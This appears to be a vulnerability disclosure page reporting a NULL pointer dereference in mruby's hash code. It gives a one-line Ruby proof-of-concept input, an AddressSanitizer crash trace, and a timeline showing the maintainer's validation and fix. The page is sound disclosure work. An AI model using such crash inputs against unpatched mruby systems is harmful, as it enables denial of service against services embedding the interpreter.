NULL Pointer Dereference in mruby/mruby

Valid

Reported on

Sep 24th 2021


Description

NULL Pointer Dereference on ea_set

Proof of Concept

// poc.rb
 [ ** ...1, From: +- ~2]

Result

mruby/bin/mruby poc.rb
AddressSanitizer:DEADLYSIGNAL
=================================================================
==28787==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000001 (pc 0x55b05da25a1a bp 0x7fffa04443e0 sp 0x7fffa04443c0 T0)
==28787==The signal is caused by a WRITE memory access.
==28787==Hint: address points to the zero page.
    #0 0x55b05da25a19 in ea_set /home/zx/asanmruby/src/hash.c:463
    #1 0x55b05da261df in ar_set /home/zx/asanmruby/src/hash.c:540
    #2 0x55b05da296f1 in h_set /home/zx/asanmruby/src/hash.c:1004
    #3 0x55b05da2aa4c in mrb_hash_set /home/zx/asanmruby/src/hash.c:1246
    #4 0x55b05da63f11 in mrb_vm_exec /home/zx/asanmruby/src/vm.c:2692
    #5 0x55b05da42182 in mrb_vm_run /home/zx/asanmruby/src/vm.c:1032
    #6 0x55b05da8345c in mrb_top_run /home/zx/asanmruby/src/vm.c:2969
    #7 0x55b05daafdef in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6896
    #8 0x55b05dab00dd in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6939
    #9 0x55b05d9ae092 in main /home/zx/asanmruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:347
    #10 0x7f3a69d830b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #11 0x55b05d9ab42d in _start (/home/zx/asanmruby/bin/mruby+0xbd42d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/zx/asanmruby/src/hash.c:463 in ea_set
==28787==ABORTING
``
We have contacted a member of the mruby team and are waiting to hear back 2 months ago
We have contacted a member of the mruby team and are waiting to hear back 2 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 2 months ago
felling good man has been awarded the disclosure bounty
The fix bounty is now up for grabs
Yukihiro
2 months ago

Maintainer


Fixed by c70159b3562e09a37577b4c6913de3ec7b8f06b4

Yukihiro "Matz" Matsumoto confirmed that a fix has been merged on c70159 2 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty